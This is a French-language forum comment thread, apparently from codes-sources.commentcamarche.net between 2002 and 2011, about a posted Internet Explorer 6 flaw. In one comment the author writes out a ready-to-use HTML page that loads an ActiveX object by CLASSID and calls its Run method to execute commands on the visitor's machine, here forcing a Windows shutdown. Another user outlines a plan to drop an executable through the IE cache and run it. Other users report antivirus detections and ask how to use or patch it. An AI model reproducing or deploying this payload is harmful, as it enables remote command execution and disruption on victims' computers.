Sujet Précédent Sujet Suivant

[MS] FAILLE IE 6.0

maxsecurite Messages postés 27 Date d'inscription jeudi 11 avril 2002 Statut Membre Dernière intervention 5 juillet 2002 - 2 juil. 2002 à 11:54
MacGaliver Messages postés 146 Date d'inscription vendredi 28 mai 2010 Statut Membre Dernière intervention 21 juillet 2013 - 18 juil. 2011 à 13:08

Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/15880-ms-faille-ie-6-0

MacGaliver Messages postés 146 Date d'inscription vendredi 28 mai 2010 Statut Membre Dernière intervention 21 juillet 2013 3
18 juil. 2011 à 13:08

Avira Antivir Personnal ne réagit point à l'éxecution, scan...

MacGaliver Messages postés 146 Date d'inscription vendredi 28 mai 2010 Statut Membre Dernière intervention 21 juillet 2013 3
23 nov. 2010 à 16:48

J'ai testé dans un fichier (*.HTA): Kaspersky à directement balayé le fichier lors de l'execution. (Fichier étant détecté en tant que trojan).

E2PZ2 Messages postés 1 Date d'inscription lundi 18 décembre 2000 Statut Membre Dernière intervention 21 décembre 2008
21 déc. 2008 à 21:20

Avast ne détécte rien xDDDDDD
Sinon il y a téllement de possibilité que...... bof quoi x)

ifebo Messages postés 181 Date d'inscription jeudi 10 mars 2005 Statut Membre Dernière intervention 28 décembre 2006
11 mai 2005 à 06:09

Kasperky aussi fonctionne. J'ai juste fait "coller" il a aussitôt hurlé ! et juste après il a carrément éffacé le collage du script de la page notepad.
Balèse !

lc2309 Messages postés 1 Date d'inscription vendredi 26 novembre 2004 Statut Membre Dernière intervention 6 février 2005
6 févr. 2005 à 15:10

Détecté comme virus par l'Antivirus Bit defender comme:

Exploit.Html.Codebase.Exec.Gen

Ca fait plaisir des antivirus qui marchent.

Bonne continuation code intéressant

cs_guilOooo Messages postés 53 Date d'inscription vendredi 19 septembre 2003 Statut Membre Dernière intervention 19 novembre 2004
7 juin 2004 à 20:31

IE est bourré de failles & bugs...
Je peux vous dire qu'un bon antivirus/firewall mets ton code en pièces !
Mais pour des ordis non sécurisés, c'est une bonne trouvaille.
Bonne continuation

sifucyr Messages postés 2 Date d'inscription samedi 25 janvier 2003 Statut Membre Dernière intervention 18 mars 2004
24 mars 2004 à 18:18

Cette "faille" n'en est pas une;
Avec les paramètres par défaut ça ne peut pas lancer d'exe lorsque ta page est en "zone internet".
Par contre, en local ça marche très bien... Ça peut être utile sur un intranet par exemple.

vjeux Messages postés 92 Date d'inscription lundi 14 avril 2003 Statut Membre Dernière intervention 5 décembre 2003
13 déc. 2003 à 14:21

Mon antivirus supprime direct le .html qui a ce code, quand il est sur internet il me ferme la page ...

Je l'ai désactivé et ca marche :D

aannick Messages postés 138 Date d'inscription jeudi 24 avril 2003 Statut Membre Dernière intervention 2 mars 2009
23 août 2003 à 06:29

avec win 2000 il faut remplacer par quoi ?
merci

Msgbox Messages postés 67 Date d'inscription lundi 1 juillet 2002 Statut Membre Dernière intervention 1 septembre 2006
13 août 2003 à 11:28

oui c marche, faut juste remplacer le chemin d cmd.exe si vous avez XP ou 2000.
Par contre il serait possible de faire une modification pour executer un programme non present sur la machine distante. G une petite idee:

1) creer un exe avec extension HTML
2) charger la page (ce aui mettrait l'exe ds la cache IE)
3) a partir de la commande copy de l'invite de commande windows faire copy ...le fichier HTML... %SystemRoot%machin.exe (faille IE6)
4) lancer l'exe (faille IE6)

Ce serait possible non ?

cs_cbu Messages postés 394 Date d'inscription mercredi 30 janvier 2002 Statut Membre Dernière intervention 4 novembre 2009 1
19 juin 2003 à 15:09

Moi je dois avoir les patchs car ca marche pas ..

steveurcle Messages postés 9 Date d'inscription vendredi 21 février 2003 Statut Membre Dernière intervention 10 mai 2006
22 févr. 2003 à 01:18

la FAILLE IE 6.0 m'interrese bcp mais mes connaisances en javascript ne me permette pas trop de comprendre le CLASSID merci beaucoup de m'aider

steveurcle Messages postés 9 Date d'inscription vendredi 21 février 2003 Statut Membre Dernière intervention 10 mai 2006
21 févr. 2003 à 23:50

je suis nouveau ici et je tenais a dire au createur de ce site qu'il est terrible je suis en ecole d'ingieur en informatique et sa m'aide. Il est super!!!!!!!

cdidic Messages postés 4 Date d'inscription vendredi 27 décembre 2002 Statut Membre Dernière intervention 25 mars 2003
10 janv. 2003 à 13:06

Juste une info g essayer ce code avec IE5.5 et ca marche aussi donc tention y dois y en avoir pas mal de buguer d IE

maxsecurite Messages postés 27 Date d'inscription jeudi 11 avril 2002 Statut Membre Dernière intervention 5 juillet 2002
5 juil. 2002 à 12:18

Message pour : "Patrice99"

C'est parce que tu à enlever l'execution des ActiveX.

mXsecurity

cs_Patrice99 Messages postés 1221 Date d'inscription jeudi 23 août 2001 Statut Membre Dernière intervention 9 septembre 2018
4 juil. 2002 à 09:37

Ok, mais il ne se passe rien lorsque je click.

maxsecurite Messages postés 27 Date d'inscription jeudi 11 avril 2002 Statut Membre Dernière intervention 5 juillet 2002
3 juil. 2002 à 13:14

Message pour "landmanu" :

tu peux rebooter la machine avec ce script :

<OBJECT ID='LaunchIt' CLASSID='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></OBJECT>
<SCRIPT>
LaunchThisApp('pidset');
LaunchThisApp('RUNDLL32.EXE user.exe,exitwindows');
function LaunchThisApp(com)
{
LaunchIt.Run(com);
}
</SCRIPT>

Message pour 'JosueClement" :

Tu peux allez télécharger un patch sur le site microsoft ( www.microsoft.com )

Message pour "Patrice99" :

C'est très simple c'est un script HTML donc tu prend notepad.exe tu colle ce code puis tu l'enregistre en ".htm"

mXsecurity

cs_Patrice99 Messages postés 1221 Date d'inscription jeudi 23 août 2001 Statut Membre Dernière intervention 9 septembre 2018
3 juil. 2002 à 09:28

Comment ca ce compile ? il suffit de faire un fichier .js et de le lancer ? ca ne marche pas ! : erreur de syntaxe line 1 char 1

JosueClement Messages postés 30 Date d'inscription lundi 4 mars 2002 Statut Membre Dernière intervention 20 décembre 2007
2 juil. 2002 à 22:52

Hé bé...!
Et y a-t-il un moyen de corriger ce bug (à part bien sur désinstaller IE6)?
Parce ke sous XP Home et XP Pro, IE 6 est installé par défaut!!!
En tout cas bien joué...

Josué Clément
josue-clement@bluewin.ch

landmanu Messages postés 3 Date d'inscription mardi 30 avril 2002 Statut Membre Dernière intervention 8 novembre 2004
2 juil. 2002 à 19:06

Je voudrai savoir si il y a possibilité de faire en sorte de rebooter l'ordi ou carrément l'éteindre grâce à la commande suivante :
c:/windows/rundll.exe user.exe,exitwindows
Le problème est ke ca ne marche pas et ke je ne sait pas executer des fonctions à l'intérieur du script donc si tu me trouve l'intégration de la commande ca serait cool merci de m'envoyer un E-Mail à landmanu@reliancesfi.com.

Sinon chapo ! ;)

maxsecurite Messages postés 27 Date d'inscription jeudi 11 avril 2002 Statut Membre Dernière intervention 5 juillet 2002
2 juil. 2002 à 11:54

Des commentaires ??

Discussions similaires

APPLICATION WEB SOUS VISUEL BASIC 6

Programme VB6 avec lien EXCEL, Pb de version d'excel

Client MSN Messenger 6 en VB6

programme VB5 ou VB6 autonome

GUID - Version Microsoft Windows common control-2 6.0

Votre réponse

Discussions similaires